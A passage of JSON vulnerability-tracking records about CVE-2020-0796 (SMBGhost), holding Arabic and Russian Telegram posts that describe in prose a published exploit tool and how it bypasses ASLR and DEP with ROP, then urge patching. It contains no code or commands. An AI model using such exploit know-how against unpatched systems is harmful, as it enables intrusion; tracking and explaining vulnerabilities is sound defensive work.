\u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f Visual Studio \u0438 .NET Framework 4.8 Developer Pack\n\n#moriarty #checker #csharp\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-05-03T09:04:40.000000Z"}, {"uuid": "a9b87f35-202d-4427-9905-013cecf759b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/TechnologyMakers_Articles/173", "content": "\u0628\u0623\u062e\u062a\u0635\u0627\u0631 \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0627\u0644\u0644\u064a \u0639\u0644\u0649 GitHub \u0647\u064a \u0623\u062f\u0627\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 (Exploit) \u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 \u0628\u0640CVE-2020-0796 \u0648\u0627\u0644\u0644\u064a \u0647\u064a \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0627\u0644\u0644\u064a \u0628\u064a\u0633\u062a\u062e\u062f\u0645 \u0641\u064a \u0645\u0634\u0627\u0631\u0643\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0639\u0644\u0649 \u0627\u0644\u0634\u0628\u0643\u0629\u060c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u0623\u0643\u0648\u0627\u062f \u062e\u0628\u064a\u062b\u0629 \u0639\u0646 \u0628\u0639\u062f (Remote Code Execution) \u0639\u0644\u0649 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\u060c \u0628\u0645\u0639\u0646\u0649 \u0625\u0646\u0647 \u064a\u0642\u062f\u0631 \u064a\u0634\u063a\u0644 \u0623\u064a \u0628\u0631\u0646\u0627\u0645\u062c \u0623\u0648 \u0633\u0643\u0631\u064a\u0628\u062a \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0636\u062d\u064a\u0629 \u0645\u0646 \u063a\u064a\u0631 \u0645\u0627 \u064a\u0643\u0648\u0646 \u0644\u064a\u0647 \u0623\u064a \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0648 \u0625\u0630\u0646 \u0645\u0633\u0628\u0642\u060c \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0645\u0643\u062a\u0648\u0628\u0629 \u0628\u0644\u063a\u0629 \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0628\u0627\u064a\u062b\u0648\u0646 \u0648\u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0645\u0643\u062a\u0628\u0627\u062a \u0632\u064a scapy \u0639\u0634\u0627\u0646 \u062a\u0648\u0644\u062f \u0648\u062a\u0639\u062f\u0644 \u0639\u0644\u0649 \u0627\u0644\u0628\u0627\u0643\u062a\u0633 (Packets) \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0628\u0627\u062f\u0644 \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0639\u0644\u0649 \u0627\u0644\u0634\u0628\u0643\u0629\u060c \u0627\u0644\u0644\u064a \u062d\u0635\u0644 \u0625\u0646\u0647 \u0641\u064a \u0645\u0627\u0631\u0633 2020\u060c \u0645\u0627\u064a\u0643\u0631\u0648\u0633\u0648\u0641\u062a \u0623\u0639\u0644\u0646\u062a \u0639\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0648\u0646\u0634\u0631\u062a \u062a\u062d\u062f\u064a\u062b \u0623\u0645\u0646\u064a \u0644\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c \u0628\u0633 \u0643\u062a\u064a\u0631 \u0645\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u062d\u0648\u0644 \u0627\u0644\u0639\u0627\u0644\u0645 \u0645\u0627 \u0637\u0628\u0642\u062a\u0634 \u0627\u0644\u062a\u062d\u062f\u064a\u062b \u062f\u0627 \u0641\u0648\u0631\u0627\u064b\u060c \u0641\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u0643\u0627\u0646\u062a \u0645\u0639\u0631\u0636\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0644\u064a \u0643\u062a\u0628 \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0643\u0627\u0646 \u0647\u062f\u0641\u0647 \u064a\u0633\u062a\u0641\u064a\u062f \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u062b\u0628\u062a \u062a\u062d\u0643\u0645\u0647 \u0627\u0644\u0643\u0627\u0645\u0644 \u0639\u0644\u0649 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0645\u0627 \u0637\u0628\u0642\u062a\u0634 \u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0645\u0646\u064a\u060c \u0643\u062a\u0627\u0628\u0629 exploit \u0644\u062b\u063a\u0631\u0629 \u0632\u064a \u062f\u064a \u0628\u062a\u062d\u062a\u0627\u062c \u0645\u0639\u0631\u0641\u0629 \u062a\u0642\u0646\u064a\u0629 \u0639\u0627\u0644\u064a\u0629 \u062c\u062f\u0627\u064b\u060c \u0645\u0634 \u0628\u0633 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629\u060c \u0644\u0643\u0646 \u0643\u0645\u0627\u0646 \u0641\u064a \u0641\u0647\u0645 \u0639\u0645\u064a\u0642 \u0644\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644\u0627\u062a \u0627\u0644\u0634\u0628\u0643\u064a\u0629 \u0648\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u062a\u0642\u0646\u064a\u0629 \u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644\u060c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u064a\u062d\u062a\u0627\u062c \u0641\u064a \u0627\u0644\u0628\u062f\u0627\u064a\u0629 \u0625\u0646\u0647 \u064a\u0639\u0645\u0644 \u062a\u062d\u0644\u064a\u0644 \u0644\u0644\u062b\u063a\u0631\u0629 (Reverse Engineering) \u0639\u0634\u0627\u0646 \u064a\u0639\u0631\u0641 \u0625\u064a\u0647 \u0627\u0644\u062e\u0644\u0644 \u0627\u0644\u0644\u064a \u0645\u0648\u062c\u0648\u062f \u0641\u064a \u0643\u0648\u062f \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u0628\u0639\u062f\u0647\u0627 \u064a\u0628\u062a\u062f\u064a \u064a\u0643\u062a\u0628 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0644\u064a \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062e\u0644\u0644 \u062f\u0627\u060c \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062a\u062d\u062f\u064a\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u0648\u0627\u062c\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0647\u064a \u0625\u0646\u0647 \u064a\u0644\u0627\u0642\u064a \u0637\u0631\u064a\u0642\u0629 \u0639\u0634\u0627\u0646 \u064a\u0639\u062f\u064a \u0645\u0646 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u064a\u0641\u0639\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062e\u0628\u064a\u062b \u0628\u062f\u0648\u0646 \u0645\u0627 \u064a\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u060c \u0648\u062f\u0627 \u0628\u064a\u062d\u062a\u0627\u062c \u0645\u0646\u0647 \u062a\u062c\u0631\u0628\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0645\u0633\u062a\u0645\u0631 \u0644\u062d\u062f \u0645\u0627 \u064a\u0648\u0635\u0644 \u0644\u0643\u0648\u062f \u064a\u0643\u0648\u0646 \u0641\u0639\u0627\u0644 \u0628\u0646\u0633\u0628\u0629 \u0643\u0628\u064a\u0631\u0629\u060c \u062e\u0637\u0648\u0631\u0629 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u064a\u062c\u064a \u0645\u0646 \u0625\u0646\u0647\u0627 \u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u0623\u0648\u0627\u0645\u0631 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0636\u062d\u064a\u0629 \u0628\u062f\u0648\u0646 \u0623\u064a \u062a\u0641\u0627\u0639\u0644 \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u060c \u064a\u0639\u0646\u064a \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0645\u0643\u0646 \u064a\u0639\u0645\u0644 \u0623\u064a \u062d\u0627\u062c\u0629 \u0628\u062f\u0627\u064a\u0629 \u0645\u0646 \u0633\u0631\u0642\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u0644\u062d\u062f \u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0627\u0644\u0643\u0627\u0645\u0644\u060c \u062f\u0627 \u063a\u064a\u0631 \u0625\u0646\u0647 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0645\u0635\u0627\u0628\u0629 \u0643\u0645\u0646\u0635\u0627\u062a \u0644\u0634\u0646 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0639\u0644\u0649 \u0623\u0647\u062f\u0627\u0641 \u062a\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0634\u0628\u0643\u0629\u060c \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0628\u0627\u0644\u0631\u063a\u0645 \u0645\u0646 \u062e\u0637\u0648\u0631\u062a\u0647\u0627 \u0625\u0644\u0627 \u0625\u0646\u0647\u0627 \u0628\u062a\u0633\u0627\u0639\u062f \u0641\u0631\u0642 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0639\u0644\u0649 \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u062a\u062d\u062f\u064a\u062f \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0645\u062d\u062a\u0627\u062c\u0629 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0623\u0645\u0646\u064a\u0629\u060c \u0627\u0644\u0645\u0647\u0645 \u0625\u0646\u0643 \u0644\u0648 \u0628\u062a\u062f\u064a\u0631 \u0634\u0628\u0643\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062c\u0647\u0627\u0632 \u0634\u062e\u0635\u064a\u060c \u0644\u0627\u0632\u0645 \u062a\u062a\u0623\u0643\u062f \u0625\u0646\u0643 \u062f\u0627\u064a\u0645\u0627\u064b \u0628\u062a\u062d\u062f\u062b \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u062a\u062b\u0628\u062a \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u0648\u0631 \u0646\u0632\u0648\u0644\u0647\u0627 \u0639\u0634\u0627\u0646 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0632\u064a \u062f\u064a\u060c \u062e\u0644\u0627\u0635\u0629 \u0627\u0644\u0643\u0644\u0627\u0645\u060c \u0627\u0644\u0623\u062f\u0627\u0629 \u062f\u064a \u0645\u062b\u0627\u0644 \u062d\u064a \u0639\u0644\u0649 \u0623\u0647\u0645\u064a\u0629 \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0639\u0644\u0649 \u0642\u062f \u0625\u064a\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0645\u0645\u0643\u0646 \u064a\u0643\u0648\u0646\u0648\u0627 \u0645\u0628\u062f\u0639\u064a\u0646 \u0641\u064a \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u0641 \u0644\u062a\u062d\u0642\u064a\u0642 \u0623\u0647\u062f\u0627\u0641\u0647\u0645\u060c \u0648\u0623\u064a\u0636\u0627\u064b \u062a\u0630\u0643\u064a\u0631 \u0628\u0636\u0631\u0648\u0631\u0629 \u0627\u0644\u0628\u0642\u0627\u0621 \u0639\u0644\u0649 \u0627\u0637\u0644\u0627\u0639 \u062f\u0627\u064a\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0623\u0641\u0636\u0644 \u0627\u0644\u0645\u0645\u0627\u0631\u0633\u0627\u062a \u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629.", "creation_timestamp": "2024-07-12T07:53:50.000000Z"}, {"uuid": "6562f476-7214-40b9-aaad-92690192a740", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/TechnologyMakers_Articles/172", "content": "\u0627\u0644\u0645\u0648\u0636\u0648\u0639 \u0628\u064a\u062a\u0643\u0644\u0645 \u0639\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0623\u0645\u0646\u064a \u0645\u0647\u0645 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMB3 \u0627\u0644\u062e\u0627\u0635 \u0628\u0623\u0646\u0638\u0645\u0629 \u0648\u064a\u0646\u062f\u0648\u0632 CVE-2020-0796 \u0623\u0648 \u0632\u064a \u0645\u0627 \u0628\u064a\u0637\u0644\u0642\u0648\u0627 \u0639\u0644\u064a\u0647 \u0623\u062d\u064a\u0627\u0646\u064b\u0627 \u0627\u0633\u0645 \"SMBGhost\" \u0647\u0648 \u062b\u063a\u0631\u0629 \u0628\u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0634\u063a\u0644 \u0623\u0643\u0648\u0627\u062f \u0636\u0627\u0631\u0629 \u0639\u0646 \u0628\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u064b\u0627 \u0644\u0623\u0646\u0647\u0627 \u0628\u062a\u0633\u0645\u062d \u0644\u0623\u064a \u0647\u0627\u0643\u0631 \u0628\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0645\u0635\u0627\u0628\u0629 \u0648\u0643\u0623\u0646\u0647\u0645 \u062c\u0648\u0627 \u0627\u0644\u062c\u0647\u0627\u0632 \u0628\u064a\u0642\u062f\u0631\u0648\u0627 \u064a\u062b\u0628\u062a\u0648\u0627 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u064a\u0633\u0631\u0642\u0648\u0627 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0623\u0648 \u062d\u062a\u0649 \u064a\u062d\u0648\u0644\u0648\u0627 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0644\u0634\u0628\u0643\u0629 Botnet \u0627\u0644\u0644\u064a \u0647\u064a \u0634\u0628\u0643\u0629 \u0645\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0628\u064a\u062a\u0645 \u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a\u0647\u0627 \u0639\u0646 \u0628\u0639\u062f \u0644\u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631\n\n\u0627\u0644\u0640Exploit \u062f\u0647 \u062a\u0645 \u0643\u062a\u0627\u0628\u062a\u0647 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0642\u0646\u064a\u0627\u062a \u0645\u0639\u0642\u062f\u0629 \u0648\u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0627\u0644\u0644\u064a \u0627\u0634\u062a\u063a\u0644\u0648\u0627 \u0639\u0644\u064a\u0647 \u0648\u0627\u062c\u0647\u0648\u0627 \u062a\u062d\u062f\u064a\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u064b\u0627 \u0623\u0648\u0644 \u062d\u0627\u062c\u0629 \u0644\u0627\u0632\u0645 \u0646\u0639\u0631\u0641\u0647\u0627 \u0625\u0646 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMB3 \u0647\u0648 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0634\u0628\u0643\u064a \u0628\u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u0646\u0642\u0644 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0641\u064a \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0645\u0648\u062c\u0648\u062f \u0641\u064a \u0643\u0644 \u0646\u0633\u062e \u0648\u064a\u0646\u062f\u0648\u0632 \u0627\u0644\u062d\u062f\u064a\u062b\u0629 \u0627\u0644\u0644\u064a \u062d\u0635\u0644 \u0647\u0648 \u0625\u0646\u0647\u0645 \u0627\u0643\u062a\u0634\u0641\u0648\u0627 \u0625\u0646 \u0641\u064a\u0647 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0637\u0631\u064a\u0642\u0629 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0644\u0628\u0639\u0636 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0628\u0639\u062a \u0639\u0628\u0631 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u062f\u064a \u0628\u062a\u062e\u0644\u064a \u0627\u0644\u0646\u0638\u0627\u0645 \u064a\u0642\u0628\u0644 \u0623\u0643\u0648\u0627\u062f \u0636\u0627\u0631\u0629 \u0648\u0628\u064a\u0634\u063a\u0644\u0647\u0627 \u0643\u0623\u0646\u0647\u0627 \u062c\u0632\u0621 \u0645\u0646 \u0627\u0644\u0646\u0638\u0627\u0645 \u0646\u0641\u0633\u0647\n\n\u0639\u0645\u0644\u064a\u0629 \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0640Exploit \u0643\u0627\u0646\u062a \u0645\u0639\u0642\u062f\u0629 \u062c\u062f\u064b\u0627 \u0644\u0623\u0646 \u0627\u0644\u0640SMB3 \u0647\u0648 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0645\u0639\u0642\u062f \u0648\u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0643\u0627\u0646\u0648\u0627 \u0645\u062d\u062a\u0627\u062c\u064a\u0646 \u064a\u0641\u0647\u0645\u0648\u0627 \u0643\u0648\u064a\u0633 \u062c\u062f\u064b\u0627 \u0625\u0632\u0627\u064a \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0628\u064a\u0634\u062a\u063a\u0644 \u0648\u0627\u064a\u0647 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u063a\u0644\u0648\u0647\u0627 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0643\u0627\u0646\u062a \u0641\u064a\u0647 \u0635\u0639\u0648\u0628\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u0632\u064a \u0645\u062b\u0644\u0627 \u0625\u0646\u0647 \u0643\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0641\u0647\u0645\u0648\u0627 \u062a\u0641\u0627\u0635\u064a\u0644 \u0639\u0645\u064a\u0642\u0629 \u062c\u062f\u064b\u0627 \u0639\u0646 \u0628\u0646\u064a\u0629 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0646\u0641\u0633\u0647 \u0648\u0639\u0646 \u0637\u0631\u064a\u0642\u0629 \u0639\u0645\u0644 \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 \u0648\u064a\u0646\u062f\u0648\u0632 \u0648\u0643\u0645\u0627\u0646 \u0639\u0646 \u0637\u0631\u0642 \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0644\u064a \u0645\u0627\u064a\u0643\u0631\u0648\u0633\u0648\u0641\u062a \u0628\u062a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0639\u0634\u0627\u0646 \u062a\u0645\u0646\u0639 \u0627\u0644\u062d\u0627\u062c\u0627\u062a \u062f\u064a\n\n\u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u062f\u0648\u0644 \u0643\u0627\u0646\u0648\u0627 \u0645\u062d\u062a\u0627\u062c\u064a\u0646 \u064a\u062a\u062e\u0637\u0648\u0627 \u0643\u0644 \u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u0642\u062f\u0631\u0648\u0627 \u064a\u0634\u063a\u0644\u0648\u0627 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0636\u0627\u0631\u0629 \u0639\u0646 \u0628\u0639\u062f \u062f\u064a \u0639\u0645\u0644\u064a\u0629 \u0645\u0634 \u0633\u0647\u0644\u0629 \u0625\u0637\u0644\u0627\u0642\u064b\u0627 \u0644\u0623\u0646 \u0646\u0638\u0627\u0645 \u0648\u064a\u0646\u062f\u0648\u0632 \u0628\u064a\u0633\u062a\u062e\u062f\u0645 \u062a\u0642\u0646\u064a\u0627\u062a \u0632\u064a \u0627\u0644\u0640ASLR \u0648\u0627\u0644\u0640DEP \u0627\u0644\u0644\u064a \u0647\u0645\u0627 \u0628\u064a\u063a\u064a\u0631\u0648\u0627 \u0623\u0645\u0627\u0643\u0646 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0648\u0628\u064a\u0645\u0646\u0639\u0648\u0627 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0636\u0627\u0631\u0629 \u0628\u0633\u0647\u0648\u0644\u0629 \u0639\u0634\u0627\u0646 \u0643\u062f\u0647 \u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0643\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0644\u0627\u0642\u0648\u0627 \u0637\u0631\u064a\u0642\u0629 \u0644\u062a\u062d\u062f\u064a\u062f \u0645\u0643\u0627\u0646 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u062f\u064a \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062f\u0642\u064a\u0642\u0629 \u062c\u062f\u064b\u0627 \u0648\u0639\u0634\u0627\u0646 \u064a\u062a\u063a\u0644\u0628\u0648\u0627 \u0639\u0644\u0649 \u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u062f\u064a \u0627\u0633\u062a\u062e\u062f\u0645\u0648\u0627 \u062d\u0627\u062c\u0627\u062a \u0632\u064a \u0627\u0644\u0640ROP \u0627\u0644\u0644\u064a \u0647\u064a \u062a\u0642\u0646\u064a\u0629 \u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0642\u0637\u0639 \u0635\u063a\u064a\u0631\u0629 \u0645\u0646 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0645\u0648\u062c\u0648\u062f\u0629 \u0623\u0635\u0644\u0627 \u0641\u064a \u0627\u0644\u0646\u0638\u0627\u0645 \u0639\u0634\u0627\u0646 \u062a\u0634\u063a\u0644 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0627\u0644\u0636\u0627\u0631\u0629\n\n\u0637\u0628\u0639\u0627 \u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u062f\u064a \u0643\u0627\u0646\u062a \u0628\u062a\u0627\u062e\u062f \u0648\u0642\u062a \u0637\u0648\u064a\u0644 \u062c\u062f\u0627 \u0648\u0643\u0627\u0646\u0648\u0627 \u0628\u064a\u0648\u0627\u062c\u0647\u0648\u0627 \u0645\u0634\u0627\u0643\u0644 \u0643\u062a\u064a\u0631 \u0641\u064a \u0643\u0644 \u062e\u0637\u0648\u0629 \u0644\u0623\u0646\u0647 \u0632\u064a \u0645\u0627 \u0642\u0648\u0644\u0646\u0627 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0645\u0639\u0642\u062f \u0648\u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u0643\u062a\u064a\u0631\u0629 \u0628\u0633 \u0641\u064a \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u0642\u062f\u0631\u0648\u0627 \u064a\u0643\u062a\u0628\u0648\u0627 \u0627\u0644\u0640Exploit \u0648\u064a\u062b\u0628\u062a\u0648\u0627 \u0625\u0646\u0647 \u0628\u064a\u0634\u062a\u063a\u0644 \u0639\u0644\u0649 \u0623\u0646\u0638\u0645\u0629 \u0648\u064a\u0646\u062f\u0648\u0632 \u0645\u0639\u064a\u0646\u0629 \u0632\u064a \u0648\u064a\u0646\u062f\u0648\u0632 10 \u0648\u064a\u0646\u062f\u0648\u0632 \u0633\u064a\u0631\u0641\u0631 2016 \u0648\u0648\u064a\u0646\u062f\u0648\u0632 \u0633\u064a\u0631\u0641\u0631 2019\n\n\u062e\u0637\u0648\u0631\u0629 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u064a\u062c\u064a \u0645\u0646 \u0625\u0646\u0647\u0627 \u0628\u062a\u0633\u0645\u062d \u0644\u0623\u064a \u0647\u0627\u0643\u0631 \u0628\u0623\u0646\u0647 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0628\u0634\u0643\u0644 \u0643\u0627\u0645\u0644 \u0648\u062f\u064a \u0645\u0634\u0643\u0644\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u064b\u0627 \u062e\u0635\u0648\u0635\u0627 \u0644\u0648 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u062f\u064a \u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u064a \u0634\u0628\u0643\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u0632\u064a \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0623\u0648 \u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629 \u0644\u0623\u0646 \u062f\u0647 \u0645\u0645\u0643\u0646 \u064a\u0624\u062f\u064a \u0644\u062a\u0633\u0631\u064a\u0628 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0623\u0648 \u062a\u062f\u0645\u064a\u0631 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u0634\u0643\u0644 \u0643\u0627\u0645\u0644 \u0648\u062f\u064a \u062d\u0627\u062c\u0629 \u062e\u0637\u064a\u0631\u0629 